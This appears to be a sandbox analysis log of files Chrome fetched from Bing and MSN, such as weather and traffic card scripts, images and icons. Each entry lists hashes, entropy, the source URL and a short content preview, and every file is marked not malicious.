                                                                                                                                                                                                                                                                        SSDEEP:1536:2WX+44C7Rfw+jhwQbkZShPhJhZtFh4lh26hQhyhjh4hYh7hXhchKhdh5h3yhLegm:2WXfRYwiMFn/M56kNiKZ9yAXDQ5RA
                                                                                                                                                                                                                                                                        MD5:959D30CA671FDDC64861350627028996
                                                                                                                                                                                                                                                                        SHA1:9F561A8A3AE81D6EF1875DDD2C76F92AAB71796E
                                                                                                                                                                                                                                                                        SHA-256:B0E27744BCB752178BAC1B377390CBBD069D4156A7E30035297486AB17476C3C
                                                                                                                                                                                                                                                                        SHA-512:D35855FA7B997D70AAFE6578015398C75FDEDC3A1BCE06B2A32B6E4E1D40BA797F4459CED1BF4A7070C05BB93B29B922F18BECB87ADA1C7880AA6F6637ED71FB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/weather-card-connector.904bcb1c2a08e1d38080.js
                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["weather-card-connector"],{42854:function(t,e,i){"use strict";i.r(e),i.d(e,{ContentDataDisplayTypes:function(){return k.jF},ContentDataRenderPlaces:function(){return k.aj},LocalizeLocationService:function(){return At.m},LocationDetectionSetting:function(){return S},LocationUtils:function(){return C},OperationFailure:function(){return k.Uh},SettingUpdateStatus:function(){return k.SU},SkyConditionCarouselBackgroundUtility:function(){return U},SkyConditionIconUtility:function(){return Jt},SkyConditionSvgIconUtility:function(){return kt.qz},StringUtils:function(){return F},ToolingInfo:function(){return oe},WeatherConditionKey:function(){return k.tk},WeatherDataActions:function(){return D},WeatherDataConnector:function(){return Nt},WeatherDataReducer:function(){return jt},WeatherDataVariant:function(){return Yt},WeatherMonthlyForecastBackgroundUtil:function(){return n},WeatherPdpClient:funct
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4853
                                                                                                                                                                                                                                                                        Entropy (8bit):7.903813188761342
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgExdO60rog98D6uIrdpnrrXpF105mVeORAXPHd:yga46Fg9g6pdxnv105mIOR6
                                                                                                                                                                                                                                                                        MD5:AC1A329E11731E1AEDCE40B69AE5943A
                                                                                                                                                                                                                                                                        SHA1:FDB06BF2A6427019F0BCAA2B0FC69FDA572452C7
                                                                                                                                                                                                                                                                        SHA-256:AE5EBB4CD136D7655E5522BF407ED29F80BB75A2592F7FB7722F118A15187C58
                                                                                                                                                                                                                                                                        SHA-512:C69510AD131CEF1D1765B3C66650A7A5D97578671286003D19DA1CFA79FFE7FC5C150B7AD72EA6ABF7C96EFA4F1D7E440FEA71F7FB08BDAAE71535477C99E2C8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_9ZR0REUVKawfOpAnR9O77w&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..o..M:....W.bCE.....L.=........<+.1^k........'...T.u'...2p95..;..g.k.4..8u.M...11[6z.>... ...W~*x...x4.a)....1J..@..8..l...sM.]..f/.L2G~.j.x...&..SW.k...N6....=....Vd.#.5.5.x.NP.rOOl.WW..F[...n\.'$..t.....'.....`.I....:............Q@b.5...o.?..k;.[.aqcs..,H.D.L.......o,Ld.BDY. ..Z..1.;.|J.s..Z..@F..Q....s..#+..)....?h!..v.......E.^...~.#?.....Ah..\....`\..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 58 x 59, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):5339
                                                                                                                                                                                                                                                                        Entropy (8bit):7.952386577766305
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:M23YP+n5adWK8bvMEYxbGb+2htMaLTje1aHQZ0Q8wnP5OCRf2FJ0sT:MzP+5ofUkt+hBL2Yw2rwnhFgqI
                                                                                                                                                                                                                                                                        MD5:C49766495653BB160FE23C0303734B7B
                                                                                                                                                                                                                                                                        SHA1:0FE8447570BB1BE0E0BD5FED00AE01A1D599EE7A
                                                                                                                                                                                                                                                                        SHA-256:BC9DD5F6FB6506EAEDCC886C79B6C72BE115A72664C9EAA2B0F89CC04D63481E
                                                                                                                                                                                                                                                                        SHA-512:7E41B4163905A6C7578F0F0AC50542FE378C1F7B919A9DDEFA04BFAB13A612B9F1BC3229684C290087AC4E4F14511968FB4F1BE770EF9987114C98144CB6FC87
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/D-hEdXC7G-DgvV_tAK4BodWZ7no.png
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR...:...;.....*.....IDATx..[y...u..3...^..j%D.....Y..#.!8....*WH.`.e....@.)J..b...@...&&.6.c..K...b% .\...VZ.......^_.Z....j.|=.=....=....0.-..>...f..]p......X../]...kj...!.5..8$(.A.E..e.....q.)..&Mj.3gN....i....f...??..xz....G............U.8..m..u..[a...|n!c...2'...p`.,....X..8..Wj..R{.....c..N....}......=7.tS....(@..".k...Komo?o.../,..?......?.&....(..Z..D...3x-.pCT...../o.......U[<..1cL..<>0P.N._.P.2.7o.:..}......Z...7#6h......b.ag............R....p]...cxm_.^.T...@....*.X{..F..P.?4..........c....f.....r.W..Hn.4.w..,.o.R.S.#.B.K..{.k...~.V./..A.L..F.n.<..I.Q....{.@.....%/.J....p<.x...._.#.s'.p.Y...*........f.JdL.7.]..Do)........`....[......Bdv........>..?........>o..jy.q98.....H}.|.."..H.RS..K..H\.t....J....=W.<..'.,YRCz..:....AR.....u.l....zm.1..1..zZ..9.G8....Z|..Q!t?3..+I3..6R..5.......S........y.j+W.<*....I.......v.b.....pUg.VL.A...4P...n........}.....DBq.)...).KN.JW-...N.........-.....tS......._..-.F(I.y...E..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4879
                                                                                                                                                                                                                                                                        Entropy (8bit):7.909046630105761
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgE9tCle2bO6k8Xwm9bwmmVNiTgZ3qwYizBWxYajUXM3gN+u7fa:yg4MMQO6TXP9bwmmecZXNQV1gNHO
                                                                                                                                                                                                                                                                        MD5:4E6090E720A5FEBEAC0CC4AD6A126A97
                                                                                                                                                                                                                                                                        SHA1:65161513DDF0EB78EA0E7A8E27C42877C6A1C742
                                                                                                                                                                                                                                                                        SHA-256:2E21A2AE45558E20407B16EED9A72FC40139C23C2F96206212757BAE521185DC
                                                                                                                                                                                                                                                                        SHA-512:F109B90FC99DC8C9A1384A7F258D1F77B4BF8217F140838614689835BB6DAD54BEBC8F70DACFD8D37143CCA5AFB81F2E8CAAFE9A4E7DF8199753EAC5AB34F1CB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_Fa9yPuPY5gIsMCqDuN-GNg&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.../.7.F.|C0.mO",..q..D..*.......t..-I...)..s....y}...c3..>...Ym.EtI.U.oEC.G..^..`qs.o].M&.R.F.m....i.hy"..F..s.C#...O_I.<Y.Kz.r.m6...4L.......qY.[<....?.....7..nI....=.......kbe]F.(.;%..g|...^..'.......k....\.'..@?\.*(-..lZ..E.k.s...>..x.R..9.}...vb...7j...s...tj.l!<..]..l.?(,9...OLVG..........,7..p3....l.e.lv...J0.....w"..<.\.;z.5h$h.....*.=:.>\v.O|.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1042
                                                                                                                                                                                                                                                                        Entropy (8bit):4.643250633952913
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7AmpUGGcLEHXSTA1udJqRcUunD8WvMI5ho7EQNU11kE:zme8uXbgJq+70I/o7Ep
                                                                                                                                                                                                                                                                        MD5:3F678119F72F6FA7F86885AE77424D87
                                                                                                                                                                                                                                                                        SHA1:E3F1B2B4495AE9C1A7B3D1CD3A97403976A76C17
                                                                                                                                                                                                                                                                        SHA-256:B1C4978024E63DF37CF1C6D5EE9D135CB9A4C5522E50C1D1C992494159926F7E
                                                                                                                                                                                                                                                                        SHA-512:949B7A9525A806F338B0C2BC6FD59B576DAE899133F6BD1F73203E415E8E6E8DBCB129B49B3B4DC5283DD3CB425BC158644329AC895CDA4F9A6B49EB01CBDF42
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx..S...q.~......OPdP.... .e...`P2.+)..&...D!.`1JR...t~vw>...ru.......>..........,...p2..."..b...xn.._.H$....K|...f.H$..jQ....0.N.v...p8@.R..r!..C.... ..c>...Z-..~.....l.X0..i.z.F&...L&......j.b.X$./.F...N....&...&..+@.^..xD$.A.P@...r..c.$...Z.p:.H'.Px.(..$L ..f.A*.B...j..L&.\,.....B.P|.p..~.6...j...R....L...T*..n...._..5........&...8.^...lF..v.p8LN....T*...N'..(.9.."...3.f...1..?.W[.._...4B...J%|>...?.Yd.....h..7co//.......w..g......?.,.;......L.....IEND.B`................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1362
                                                                                                                                                                                                                                                                        Entropy (8bit):4.764409764786972
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7GbP+J5W457HOsjgkhoDWcpHL2/t57qiWa8ZT1a+1pbHiehxNpBNsA/:3bPb45Ukh7cpr2/tEfaoRVjdsa
                                                                                                                                                                                                                                                                        MD5:F5A837F815886D5BB0AA47AFD8D416C0
                                                                                                                                                                                                                                                                        SHA1:D53FE6FA5B387C1464400E9DFA74D2629578FDC0
                                                                                                                                                                                                                                                                        SHA-256:78F43709977245B6239D816A09FFE0B68BACEC488F15618CA0CE66A002C5A472
                                                                                                                                                                                                                                                                        SHA-512:292CB59926DB7D811738F6E3F380AFBE8C7EE0016D468B9F51E876714C6A00995C0CF5B2CC084A9F07389ABC9306FB2471915E0635B5054A69598C9047AA12B9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBphlIt.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....kIDATx..OH.q..?..ss..e..\9m...i...Q.&.H^....:..<u...Ix.:DP..3.<.......P4.J.ej..... .../=.......<.-....F.D@.....G..FU~!6...&.I...b.5.....GA...N....|.(.....r......M=.T....J<.34.z....~=A...P..MH..ZQ..q.tK..w..>7F..b.(....3..2...X.....c.T.-V..+%y.^4C_...aOB......PXZ.cM..!)..9...lIO.zV..I.........AtV....9..+.P..e[.u..h....#7d....@...}....|.}D.9.)4.)B&<...Fw.....a.K..%...i. ....9..^...x.z0M..##..#.3..l.4.dR#...t2.'.F".t.......|.)....s..f....{h?VYbz.Q..e.mu..?......T..E8.A...y.y..?:.k.%i.4e..c........g$C*i1......OYDeu.d...KB..Mg.M..~....J..j`G.n'3......u.^..3J.f..~O..>x..H....p.hm.M....2.......U.6....IEND.B`................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6005
                                                                                                                                                                                                                                                                        Entropy (8bit):7.9282191159615
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEsFXLKgXvbN8PavnOROTsFBSUI7ykx+h1Boc9EXW/Y3rkQ6ngsdf9:ygl9rXvbN8PavORnBSUIWonci7ktngs
                                                                                                                                                                                                                                                                        MD5:52A594FB59BE6F84D5E208ACDB82CD94
                                                                                                                                                                                                                                                                        SHA1:D5DAAA1FF6BAA4DF9A508F40A37FD6FF8DC01FA7
                                                                                                                                                                                                                                                                        SHA-256:1C61BF996F99F0CB8B46C2E14E98A16BEA5BA99F7014E601DE1D5332EF58E7A7
                                                                                                                                                                                                                                                                        SHA-512:A3AA156C2337FD3EE2CC38FEA9F8AB6209BD99243AD50E8AE59970478394E38E0F77E144155500CE91AF6120449995A88F41A0C166D297637DCE41BC044ACEE4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..C.9v1....M.&@.....J.<!.#I...;..(T..#.J..l1.b.....2FUm...*RP.g...?Jg.....x..L..PL.z..k.C....a.`.anA..w.D`...~..ecw.jQi.9ie.RDh>.v......GNM/MK}....K.e..J.....~..>.c..)S.w{.9YY..C...C.,qF.Q.`(..)....UV..x. .YIs...7_..R.Q..Wk...E7.?.....5^i-.1JQ..*. ......k....y.....g-..?2i...O.}H8...^.X..Z......Jq........F......GXy..t<~X.?....h.]mE.?.Al.R.G.^.c..YX.u.Hd.+.m~R..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (426), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):426
                                                                                                                                                                                                                                                                        Entropy (8bit):4.904019517984965
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:2gcmRRt9Y4LF1Zd4XV4LFUXCdg/qUWYzP++xAQI:2gcmRRFfgiUb6MAj
                                                                                                                                                                                                                                                                        MD5:857A0DE0BBF14F3427A1AFA5CD985BCE
                                                                                                                                                                                                                                                                        SHA1:0C1D2E767F07E5C0F14EA64980DB213D379CC6F7
                                                                                                                                                                                                                                                                        SHA-256:3ED65F33193430C0B9DB61FFE7F5FE27B29F86A28563992C3AFC47D4C22C23D7
                                                                                                                                                                                                                                                                        SHA-512:E7F2603855A16464417B772517676F080CCEFFB8069C687BAC798B7EB2875FCDC207E40E8C56E7CFFD4D56CED572270988599D1D2B73FB8AAA7FDD076FE3E7B7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/DB0udn8H5cDxTqZJgNshPTecxvc.js
                                                                                                                                                                                                                                                                        Preview:(function(n){function i(){var i=document.documentElement,r=document.body,u="innerWidth"in window?window.innerWidth:i.clientWidth,f="innerHeight"in window?window.innerHeight:i.clientHeight,e=window.pageXOffset||i.scrollLeft,o=window.pageYOffset||i.scrollTop,s=document.visibilityState||"default";n.enqueue(t,{x:e,y:o,w:u,h:f,dw:r.clientWidth,dh:r.clientHeight,v:s})}var t="V";n.wireup(t,{load:null,compute:i,unload:null})})(BM)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (24161)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):210559
                                                                                                                                                                                                                                                                        Entropy (8bit):5.345941373912795
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:114W9Z6fgRYCxp0dcf1K5Rzb8qvxCbhL/:oW9Z64RFxp0dcf1Ka
                                                                                                                                                                                                                                                                        MD5:71A2F8988438EC608744C97E04BD5BFF
                                                                                                                                                                                                                                                                        SHA1:22428474D905216EFCCD5EBAFDE459EDF101616D
                                                                                                                                                                                                                                                                        SHA-256:8AB3F8361BD91BAED007F4648BEDE8A24C4738768A67AF2E5B661119493A1987
                                                                                                                                                                                                                                                                        SHA-512:AE81D383332002D6819AB930EB08A92280234844A55D62BDE3483E38848029E858C75910C62CC627FD243ABFD63CC55F2F0631549CA8CCB9316DCC362FB44E55
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/traffic-card-wc.43495e1e08e030161787.js
                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["traffic-card-wc"],{19456:function(t,e){"use strict";e.Z='<svg width="14" height="15" viewBox="0 0 14 15"><path d="M11.77.75c.31 0 .6.06.87.18A2.2 2.2 0 0 1 14 2.98a2.2 2.2 0 0 1-.66 1.57L4.2 13.7 0 14.76l1.05-4.21 9.14-9.13a2.19 2.19 0 0 1 .73-.49c.27-.11.55-.17.85-.17Zm-9.75 9.88a2.78 2.78 0 0 1 1.32.78 2.76 2.76 0 0 1 .78 1.32l7.6-7.6-2.1-2.1-7.6 7.6Zm-.99 3.09 2.4-.6a2.09 2.09 0 0 0-.22-.64 2.04 2.04 0 0 0-.4-.54 2.04 2.04 0 0 0-.54-.4 2.09 2.09 0 0 0-.64-.23l-.6 2.4Zm11.22-9.13.37-.35a2.93 2.93 0 0 0 .32-.36c.1-.12.17-.26.22-.4a1.36 1.36 0 0 0 .09-.5 1.5 1.5 0 0 0-.9-1.36 1.4 1.4 0 0 0-.58-.12 1.36 1.36 0 0 0-.5.09 1.73 1.73 0 0 0-.4.22 3.06 3.06 0 0 0-.36.32l-.35.37 2.09 2.1Z"/></svg>'},94522:function(t,e){"use strict";e.Z='<svg width="12" height="12" viewBox="0 0 2048 2048" role="presentation"><path d="M2014 853q0 58-32 106t-86 70l-535 223q-13 5-23 15t-14 25l-175 582q-6 20-22 33t
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1391
                                                                                                                                                                                                                                                                        Entropy (8bit):4.796412914000846
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t4LxSdeBU4dxCey0fA53J/S/7/sG5BmefEqrR5GTGOby2NF2E/:+xSUBU4S55Z/aB5BmefEqrRYK6
                                                                                                                                                                                                                                                                        MD5:620580657E8A45B4A7B8450B8DA5CD32
                                                                                                                                                                                                                                                                        SHA1:922187F6E9192BA43886FB43B70C15735CAFB9E8
                                                                                                                                                                                                                                                                        SHA-256:91DE3100632E986CDB6897793EF1B2A8655B15ED4145098CA489856C043D207E
                                                                                                                                                                                                                                                                        SHA-512:F3CE71CD92BA2C6ABD6CDEE48F677522439CAD023042D56728E5CB2DED5EC51D1170308FB1524C4A352AC6C5E4E514147D21B99667CCE54CE35A73D91DD27E4B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svg
                                                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 40 40" width="64" height="64">.. <style type="text/css">.. .anim {.. animation-name: blink;.. animation-duration: 1s;.. animation-iteration-count: infinite;.. fill: #05E9F5;.. transition-timing-function: linear;.. }.. @keyframes blink {.. 0% {.. opacity: 0.. }.. 50% {.. opacity: 1.. }.. 75% {.. opacity: 1.. }.. 100% {.. opacity: 1.. }.. }.. .delay1 {.. animation-delay: 0s;.. }.. .delay2 {.. animation-delay: .125s;.. }.. .delay3 {.. animation-delay: .25s;.. }.. .delay4 {.. animation-delay: .375s;.. }.. .delay5 {.. animation-delay: .5s;.. }.. .delay6 {.. animation-delay: .675s;.. }.. .delay7 {.. animation-delay: .75s;.. }.. .delay8 {.. animation-delay: .875s;.. }.. </style>.. <circle class="delay1 anim" cx="20" cy="8" r="3" />.. <circle class="delay5 anim"
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1410
                                                                                                                                                                                                                                                                        Entropy (8bit):4.770304768304694
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7kPInmFWkglLh6an1r/zoxz2UwzB6NCgzAo0l8z0gtcodb:DQpkAVBx/iavzB6NZAo0l8zltck
                                                                                                                                                                                                                                                                        MD5:936CA8F6DF41F841CAAE5362CC94FA29
                                                                                                                                                                                                                                                                        SHA1:6406FB60A3693E481AFB3394588A5F14320C167F
                                                                                                                                                                                                                                                                        SHA-256:EED3E25F9E4237A3AAFE7BC3536702FBDEB6B14073063300C4F61784175AC300
                                                                                                                                                                                                                                                                        SHA-512:CD3AFE4229C100BCB27B21868DE8092C88A5FB2DAEC68A4883158581B138D92701F4403B345E6E4F1E248B38BE9F810BA7F71ADC5F5153A68E3D9774891B21EC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx...]H.Q.....VNg..E.R0.(..,.G.AaH...i]t.x.M7...W.)..iV..........0.Aa.YA.}.J.M.:........9.w...<.O.....y.........r.P.[k......o..;:...9u...|..\....Z.......l.&..........2N3.......K.u.....V>........'.W......D..J...1..b..R.F.C.x..E...'`1..RP.......$cW.>.....U.....0DD..'...AfV6Y....<mo.+.. ..t...;-.4............2q.......=b........Ett.4@..|$..-..<.q.>8.w...].F.U^NY.MPkX.......... .^(q?..(....e.../..h.0.L.........0../Pq...@-.3...^'*....-..../.x'<..$......$...`kj.....@...F.T.'|..|..3!...V........0...7.P... .R.U..JI....e!.7.e.G..F....I..7.h.5)cV.v.......K"....'..m.*...8!..$Iy.....X.HO.h4....?.<f...=......E..O......#..U....IEND.B`........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2524), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2524
                                                                                                                                                                                                                                                                        Entropy (8bit):5.496443534651084
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:PvB3ugs9kys5b+qM4qKr+KOHaH4ZMLSyKQug1LL7j:PvB89kyPWqKKKOHY4Z+zn
                                                                                                                                                                                                                                                                        MD5:17CDAB99027114DBCBD9D573C5B7A8A9
                                                                                                                                                                                                                                                                        SHA1:42D65CAAE34EBA7A051342B24972665E61FA6AE2
                                                                                                                                                                                                                                                                        SHA-256:5FF6B0F0620AA14559D5D869DBEB96FEBC4014051FA7D5DF20223B10B35312DE
                                                                                                                                                                                                                                                                        SHA-512:1FE83B7EC455840A8DDB4EEDBBCD017F4B6183772A9643D40117A96D5FFF70E8083E424D64DEBA209E0EF2E54368ACD58E16E47A6810D6595E1D89D90BCA149A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/QtZcquNOunoFE0KySXJmXmH6auI.js
                                                                                                                                                                                                                                                                        Preview:var RewardsHeaderSVG;(function(n){function w(){s()}function b(n,t){var i=sj_cook.get(h,l);t?n.indexOf(i)>-1?o():s():k()>0&&o()}function o(){g();sb_st(nt,u);sb_st(d,u)}function k(){var n=sj_cook.get(c,a);return parseInt(n)}function d(){sj_evt.fire(v)}function s(){sj_evt.fire(y)}function g(){var u=_ge(r),n;_ge(t)&&Lib.CssClass.add(_ge(t),"rd_hide");_ge(i)&&Lib.CssClass.add(_ge(i),"rd_hide");u&&(n=document.createElement("img"),n.setAttribute("id","coinFlipGif"),n.setAttribute("class","rhcoinflip"),n.setAttribute("src",p),u.appendChild(n),u.style.display="block")}function nt(){_ge(r).style.display="none";_ge(t)&&Lib.CssClass.remove(_ge(t),"rd_hide");_ge(i)&&Lib.CssClass.remove(_ge(i),"rd_hide")}var h="_RwBf",c="_SS",l="v",a="RP",r="coinFlipGifContainer",t="rewards_header_icon serp",i="rewards_header_icon hp",v="rewardsRedDot",y="redDotAnimation",u=1750,p="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/coin_flip_3d.gif",f=_d.querySelector(".rhlined.serp, .rhlined.hp"),e=_d.que
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):15304
                                                                                                                                                                                                                                                                        Entropy (8bit):7.9616942640776465
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:eFn96/KruPDPwA0e0JotodfKPjAVxGvOXzVfW8VykVHGC05Sp9rTxh:eN96/1rPwwLtoNujAxA8p1Hp3JD
                                                                                                                                                                                                                                                                        MD5:93F9C1B34D75E005555B47E166C398FB
                                                                                                                                                                                                                                                                        SHA1:61F7A43AD6E90F0582C9C1C692F79EDC5B54B4B1
                                                                                                                                                                                                                                                                        SHA-256:7486DE6151B3D5CA59ABFB102CFA6B1401A96A86F0FE32D6277C6775F8FBE63D
                                                                                                                                                                                                                                                                        SHA-512:F54C70AB31301F159C0B9E1EA76C94FA1799FC6C8946476E667001B89AC75C27E4466A974D29F7B68B2B8EC702C58575E35B4635AED67A81789089DC940DE826
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...J..Nv.>..5..)dr.(..sQk.%.i..$.r.O........`B..@.r.I..l......=....j_j..?..>`9..P...`...K.H#.7...$....@pM2^..t[.OM.evi-$?6.Nz..K.i~$...".?vr.}..m|I|......b.M..3...;...g.U.M.(..y.^.^.^k...q..\..$.YFr+.<..Zx...i.4..2#........J......N:..+;.7ZYc..*...x..x.;..xxZ...du\..r..6.....i[c..5.gv.>^...s..k5{..16....3>Gz.q.N.zm.B8<.Z.%..J...VM...;V......P..[(...P....e>^*..,
